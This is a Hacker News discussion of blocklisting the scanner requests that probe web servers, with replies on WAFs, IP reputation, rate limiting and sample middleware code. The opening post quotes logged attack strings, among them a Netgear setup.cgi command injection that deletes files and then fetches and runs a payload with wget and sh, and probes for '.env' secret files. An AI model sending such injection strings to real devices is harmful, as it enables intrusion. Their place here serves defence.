Ask HN: Can we collaborate on an IP Address or Regex blacklist?
36 points by usernamebias 10 days ago | 43 comments
Hear me out.

I've recently started logging pings to my services. A LOT of servers ping me constantly, checking for things like '.env' and other known vulnerabilities. I currently have a JSON dataset of about 10K entries. It looks like this:

{ "offense": "boaform/admin/formLogin?username=ec8&psd=ec8", "ipAddress": "" },

{ "offense": ".env", "ipAddress": "" },

{ "offense": "setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+;sh+netgear&curpath=/&currentsetting.htm=1", "ipAddress": "" }

Maybe we don't filter by IP address, and instead filter requests based on known strings (or regex). That's what I'm currently doing. Ex.: if a request includes '.env', it's blocked!

I'd love to implement a more aggressive strategy rather than a reactive one. I'm currently finding myself going through server logs and adding new 'keywords' to the 'banned list'.

Something like an 'ad blocklist' that we can use as middleware in our HTTP applications.

If something exists already, kindly point me to a Github.

Project Honeypot has been doing this (IP address reputation scoring) for something like 16 years (disclaimer: I once worked for a sibling company and developed an early Apache module for it).

What you propose is very similar to what happens with email IP reputation. If you look at all of the effort that goes into verifying as few false positives and false negatives as possible, you should probably consider why that effort is put in. Example: what happens if a malicious user who works on behalf of a rival company to yours creates a Pull Request to your list with your customer’s IP addresses? Could you realistically identify the issue and the malicious user before it hurt your corporate reputation?

I don’t think your idea is bad, but you have to realize that the concept of an IP address as a proxy for an actor/reputation is not as valuable in recent years as it used to be. With IPv6 and cheap botnet access, your list will fill up with junk when the attacker spends very little effort to add new GET/POST rules and new clients.

I would recommend you spend some time considering how much you care about this particular cat and mouse game when CDNs and WAFs have already made products which cater to this need.

What are you going to do when the addresses are SaaS and your blacklist is now impinging on your own use of FAANG and DC cloud-hosted services?

What are you going to do when the addresses belong to the US mil and are being promiscuously misused by lots of ISPs?

What are you going to do about politically motivated and other non-benign influences on the blacklist, like wanting to boycott China?

(I work in a regional internet registry, so I should declare my interest, I guess.)

A ton of sketchy stuff comes from people renting time on AWS, GCloud, or some other service provider. One of the addresses OP lists is an AWS EC2 instance. The other one looks to be an Azure IP served out of Virginia. Today they could be someone doing something sketchy, but tomorrow they could be assigned to completely legit users.

Sure, you could just block any IP that geolocates to Russia, China, or whatever locale is the current worst nation-state actor, but IP blocking is worse than Sisyphean.

It's a bit extreme, but if your service/site is meant to be consumed by physical users (e.g. a B2C type app), you could probably block the entire IP ranges of all the major cloud providers to prevent this kind of behavior. They all publish their CIDRs online, so it wouldn't be difficult.

Wait until you find out how many people use VPN services whose endpoints are hosted in a cloud provider. IP address blocking is a fool's errand.

Maybe we don't filter by IP address, and instead filter requests based on known strings (or regex). That's what I'm currently doing. Ex.: if a request includes '.env', it's blocked!

I'd love to implement a more aggressive strategy rather than a reactive one. I'm currently finding myself going through server logs and adding new 'keywords' to the 'banned list'.

you could just use modsecurity locally on whatever's between the internet and your web application if you insist something external like cloudflare is out of your control


but bogging this up at application level is not going to work in anyone's favour

Yeah, you're talking about what software like SolarWinds intrusion detection is supposed to do. How well did that work for them?

What's wrong with wanting to boycott China?

Start with your phone and computer.

Manufacturing is already leaving china in droves, which is awesome. I only buy Apple devices and they have been putting a lot of effort into getting out. I hope everyone else follows suit. China is a dangerous, insane dictatorship that is a threat to humanity.

There was a GitHub repo posted some time ago that contained a list of ASNs (basically IDs of datacenters) where most attackers/spammers come from. Simply blocking those ASNs helped the author stop almost all of their bad requests. I wish I had bookmarked it, but maybe somebody else can chime in...

That's a great start. But blocking entire data centers seems too aggressive for public SaaS applications.

This has lit a fire in my arse. I'm going to create a repo tomorrow for ExpressJS (I'm a NodeJS nerd).

It can be used like this


It will compare every request to a known .txt of strings such as '.env' and others.
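A minimal sketch of what such a middleware could look like, assuming a blocklist file with one substring per line. The names `parseBlocklist`, `isBlocked`, and `createBlocklistMiddleware` are hypothetical, and the three patterns are taken from the sample dataset above. It uses only the `(req, res, next)` shape and Node's `res.statusCode` / `res.end`, so it has no dependencies.

```javascript
// Hypothetical blocklist contents; in practice this would be read from the shared .txt file.
const BLOCKLIST_TEXT = `
# one substring per line; lines starting with # are comments
.env
boaform/admin/formLogin
setup.cgi
`;

// Turn the raw text into a list of lowercase substrings, skipping blanks and comments.
function parseBlocklist(text) {
  return text
    .split("\n")
    .map((line) => line.trim().toLowerCase())
    .filter((line) => line.length > 0 && !line.startsWith("#"));
}

// True when the (percent-decoded, lowercased) URL contains any blocklisted substring.
function isBlocked(url, patterns) {
  let decoded;
  try {
    decoded = decodeURIComponent(url);
  } catch {
    decoded = url; // malformed percent-encoding: fall back to the raw URL
  }
  const haystack = decoded.toLowerCase();
  return patterns.some((pattern) => haystack.includes(pattern));
}

// Express-style middleware factory: answer 403 for blocked URLs, otherwise continue.
function createBlocklistMiddleware(patterns) {
  return function blocklistMiddleware(req, res, next) {
    if (isBlocked(req.url, patterns)) {
      res.statusCode = 403;
      res.end("Forbidden");
      return;
    }
    next();
  };
}
```

In an Express app this would presumably be registered with something like `app.use(createBlocklistMiddleware(parseBlocklist(text)))`. Plain substring matching over-blocks (any URL containing `.env` anywhere is rejected), which is one reason anchored regexes might be worth the extra effort.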

Regex is NOT my forte. Can I count on some of you guys to pitch in?

Yeah, you're looking at something external to your application, like a layer 7 firewall. I don't think Node.js is the tool for the job here. You want to stop this traffic way before it even hits your web service, with an external WAF.

That's beyond my capabilities. I can certainly create a big preliminary .txt file from my dataset, and hopefully the open source community can take it from there.

CloudFlare is not beyond your capabilities.

If you have a domain name (as opposed to just an IP address), you could have finished this project with CloudFlare in the time it took you to post to HN. You are almost certainly going to fall into the free tier.

Disclaimer: I used to work for the founders of CloudFlare.

Note: CloudFlare is not the only SaaS / PaaS in this CDN/WAF space, but it is the easiest to get started with (last I checked).

Have you considered the scale of the problem and how it would affect performance on your server?

Running pattern matching early in Node middleware that checks against a very very large block list will progressively choke every server that implements it.

If you decide to implement it, I recommend you look at how GeoMind API works. IP addresses are just displayed as octets for human readability; use the integer representation for faster+cleaner comparisons.
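As a rough illustration of the integer-representation point, here is a sketch that converts dotted IPv4 addresses to integers and tests them against a CIDR block with two numeric comparisons. The function names are hypothetical, the addresses come from the reserved documentation range, and IPv6 is out of scope (it would need `BigInt`).

```javascript
// Convert a dotted-quad IPv4 string to an unsigned integer.
// Multiplication is used instead of bit shifts, because JavaScript's
// bitwise operators work on signed 32-bit values.
function ipv4ToInt(ip) {
  const parts = ip.split(".");
  if (parts.length !== 4) throw new Error(`not an IPv4 address: ${ip}`);
  let value = 0;
  for (const part of parts) {
    if (!/^\d{1,3}$/.test(part)) throw new Error(`bad octet in ${ip}`);
    const octet = Number(part);
    if (octet > 255) throw new Error(`octet out of range in ${ip}`);
    value = value * 256 + octet;
  }
  return value;
}

// Parse "a.b.c.d/n" into an inclusive integer range { start, end }.
function parseCidr(cidr) {
  const [base, bitsText] = cidr.split("/");
  const bits = Number(bitsText);
  if (!Number.isInteger(bits) || bits < 0 || bits > 32) {
    throw new Error(`bad prefix length in ${cidr}`);
  }
  const size = 2 ** (32 - bits);
  const start = Math.floor(ipv4ToInt(base) / size) * size; // align to the block boundary
  return { start, end: start + size - 1 };
}

// Range membership is then just two integer comparisons.
function inRange(ip, range) {
  const n = ipv4ToInt(ip);
  return n >= range.start && n <= range.end;
}

const blockedRange = parseCidr("192.0.2.0/24");
console.log(inRange("192.0.2.77", blockedRange)); // true
console.log(inRange("192.0.3.1", blockedRange)); // false
```

With many ranges, the parsed `{ start, end }` pairs could be sorted once and binary-searched per request, rather than scanned linearly.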

That's the one, thanks!

That's less of a solution when you aren't able to blackhole route them in BGP

I usually set up nginx to "default ignore" and only respond to specific paths which I can name... works for api only domains at any rate. just use an explicit subfolder like /api/ ... cuts down on the noise.

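    location / {
            # 444 is nginx-specific: close the connection without sending a response
            access_log off;
            return 444;
    }

    location /a/ {
            # handler directives for the real routes go here
    }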

Can't do that when 404's are expected from actual customers. I need to redirect 404 to /

yeah depends on your site structure.. you could always stop the logging (or log to a different file) but return a human 404 with links to legit routes etc. the main thing is to remove the noise so you can focus on the more targeted probing.

I’ve been in various security adjacent jobs over the past 30+ years, and many times I’ve been working with security experts to try to secure some service or another that my team supports.

IP address reputation based blocking was a concept that we saw back in the mid-90s when I was fighting spam as the Senior Internet Mail Administrator at AOL. It worked okay, for a while. It quickly became a game of cat-and-mouse, where some spammers wouldn’t care that we blocked them, but plenty others found various ways around the blocks we were implementing.

More than 25 years later, and the problem really hasn’t changed that much. You still get lots of people who think they can just block stuff by IP addresses and that will solve all the problems.

The best modern WAFs that I’ve seen in the past five to ten years are probabilistic at best. Set the rejection threshold too low, and you start getting way too many false positive hits. Set the rejection threshold too high, and too many attacks just skip right past the WAF. They are a tool you need to have in your toolbox and you need to make use of them, but they are weak protection, at best. They’re table stakes, which set a low bar for your attackers to clear.

Mod_Security is an excellent example of a free and relatively low effort WAF that you can implement, but there are alternatives. Fastly is a well known commercial CDN/WAF provider, but Cloudflare has their WAF service, AWS has a built-in service, etc....

If you really want to be secure against attackers, you need to make sure that every layer of your code is secure. Do all the standard network scanning and fuzzing tools. Have someone play red team against your system and see if they can penetrate your defenses. Use the source code analysis tools that are appropriate for your language — Fortify might not always be the right answer. Use the dynamic application security tools like the stuff from Contrast Security, where they can scan your object code as it is running in real time and monitor for all known vulnerabilities and attack patterns, and then update that list of things to scan for in real time.

Make sure you actually fix the weaknesses that are turned up by these tools. It doesn’t help you to identify a bunch of problems and then just leave them unfixed.

The OWASP stuff is a start, but they’re just skimming the surface. This is a true deepness with no bottom.

Good idea. It would be nice to feed these bad requests into the per-IP rate limiter and just count them as being more than one request. Fetch index.html, that counts towards the rate limit as 1 request. Fetch DROP DATABASE users.html, that counts as 1000 requests. If your quota is 120 requests per minute (the arbitrary value I picked for my personal website), you're gone for 8 minutes.
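A sketch of that weighted rate limit, assuming a per-IP token bucket that is allowed to go into debt. The class name, the `requestCost` helper, and the pattern list are hypothetical; the 120-per-minute quota and the cost of 1000 come from the numbers above. The clock is passed in explicitly so the behaviour is easy to check.

```javascript
// Cost of a request: 1 normally, 1000 if the URL matches a known-bad substring.
function requestCost(url, badPatterns) {
  return badPatterns.some((pattern) => url.includes(pattern)) ? 1000 : 1;
}

class WeightedRateLimiter {
  constructor(quotaPerMinute) {
    this.capacity = quotaPerMinute;
    this.refillPerMs = quotaPerMinute / 60000;
    this.buckets = new Map(); // ip -> { tokens, updatedAt }
  }

  // Returns true if the request is within quota. An allowed request is
  // charged its full cost, so one expensive request can push the bucket
  // far below zero and keep the address locked out while it refills.
  charge(ip, cost, nowMs) {
    const bucket =
      this.buckets.get(ip) ?? { tokens: this.capacity, updatedAt: nowMs };
    const elapsed = nowMs - bucket.updatedAt;
    bucket.tokens = Math.min(
      this.capacity,
      bucket.tokens + elapsed * this.refillPerMs
    );
    bucket.updatedAt = nowMs;
    const allowed = bucket.tokens >= 1;
    if (allowed) bucket.tokens -= cost;
    this.buckets.set(ip, bucket);
    return allowed;
  }
}

const limiter = new WeightedRateLimiter(120);
const badPatterns = [".env", "setup.cgi"];
const ip = "198.51.100.7";

limiter.charge(ip, requestCost("/index.html", badPatterns), 0); // costs 1
limiter.charge(ip, requestCost("/.env", badPatterns), 0); // costs 1000
console.log(limiter.charge(ip, 1, 60_000)); // false: still in debt a minute later
console.log(limiter.charge(ip, 1, 480_000)); // true: recovered after eight minutes
```

Because the bucket starts full, the lockout here ends a little before the eight-minute mark; the exact figure depends on how much quota the address had left when it made the bad request.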

How useful it is to rate limit on known attacks, I don't actually know. I feel like you really only need one request to exploit a 0day, so it probably provides no protection.

Loading a big .txt file into memory and comparing each request to it feels like a good first start. Hopefully the open source community takes it further.

Yeah. This is kind of a thing that already exists, it's typically marketed as a "web application firewall". Like most antivirus, it's more for show than anything. Nice layer of protection if someone is really piping HTTP headers directly into database queries without quoting, or installed a 20 years out of date app behind the firewall. Most people aren't really doing that anymore, so the value is unclear to me. But, plenty of people will sell you one, so there must be some value. (Notably, it's required for certain compliance certifications.)

Is there one that comes in (.txt, .csv, etc) that I can download for free? I'd like to put together a proof of concept for ExpressJS (NodeJS) tomorrow.

Doubt this is the state of the art, but ModSecurity seems to exist and has rulesets floating around, like this one from OWASP: https://github.com/coreruleset/coreruleset

Here is a random Node binding for libModSecurity I found: https://github.com/manishmalik/Modsecurity-nodejs

The problem with IP addresses is that many ISPs rotate IPs between customers, especially IPv4 addresses. If an ISP starts running out of addresses, they may have to start using NAT. "Privacy" VPNs also do the same (by design).

A banned IP may be rotated to a legitimate user under many scenarios. Only ban/blackhole IPs for a limited duration.
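A small sketch of time-limited bans, assuming an in-memory map from IP to expiry timestamp. The class name and the one-hour duration are hypothetical; a real deployment would choose its own duration and probably a shared store.

```javascript
class TemporaryBanList {
  constructor(banDurationMs) {
    this.banDurationMs = banDurationMs;
    this.expiresAt = new Map(); // ip -> timestamp (ms) at which the ban lapses
  }

  // Ban (or re-ban) an address for the configured duration.
  ban(ip, nowMs = Date.now()) {
    this.expiresAt.set(ip, nowMs + this.banDurationMs);
  }

  // True while the ban is active; lapsed entries are forgotten on lookup.
  isBanned(ip, nowMs = Date.now()) {
    const expiry = this.expiresAt.get(ip);
    if (expiry === undefined) return false;
    if (nowMs >= expiry) {
      this.expiresAt.delete(ip);
      return false;
    }
    return true;
  }
}

const ONE_HOUR_MS = 60 * 60 * 1000;
const bans = new TemporaryBanList(ONE_HOUR_MS);
bans.ban("203.0.113.9", 0);
console.log(bans.isBanned("203.0.113.9", 1_000)); // true
console.log(bans.isBanned("203.0.113.9", ONE_HOUR_MS)); // false: the ban has lapsed
```

Expiring entries on lookup keeps the code short, but addresses that never return stay in the map, so a periodic sweep would be needed for a long-running process.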

Is this not sorta like https://www.dronebl.org ?

DroneBL administrator here! DroneBL does list many classes of abusive IPs, although most of our listings originate from IRC (as opposed to, say, Project Honeypot, which sources them from web spam). That said, though, it's apparently very popular to abuse IRC with open proxies, "free" VPNs, and many other sources of rotatable IPs, most of which overlap with what website administrators deal with. I am aware of a few sites that use DroneBL to measurably reduce abuse.

Note, however, that you may find our listing coverage lacking for web-only issues, such as WordPress pingback spammers, forum spammers (not using a proxy or VPN), etc. Especially in comparison to something like Project Honeypot.

A layered defense is the best defense. Firewalling, application hardening, rate-limits, hellbans, risk-scoring, etc., especially in combination with a blacklist, can significantly frustrate and discourage attackers and spammers. No single measure (other than extensive manual moderation queues) will prevent abuse entirely, but the more roadblocks you put up, the more likely the abuser is to give up.

You might want to head over to Shadow Server and take a look at their network reporting. https://www.shadowserver.org/what-we-do/network-reporting/

Is this not essentially what cloudflare does with the IPs it is tracking? If your ip is showing abuse or problems you get knocked to the "boat or bike" system to at least slow you down a notch?

Maybe it's just me but I tend not to worry much about these scans.

Another issue is that these are all just scripts that scan things randomly and it takes a minute to set it up on a new server.

That means whenever a server is compromised it'd have this type of stuff installed and it'd start running it immediately.

That means two things: the list would indefinitely block servers that have been compromised but then cleaned up, and you'd never get a list comprehensive enough because servers are constantly being compromised.

Why? It's a fruitless endeavor. Keep internet facing things patched, limit exposure of internet facing things. If the idea of seeing those events in a log bothers you, restrict your logging to the paths you care about. :)

Dumb question: how does the checking for .env work?


What about a denylist?
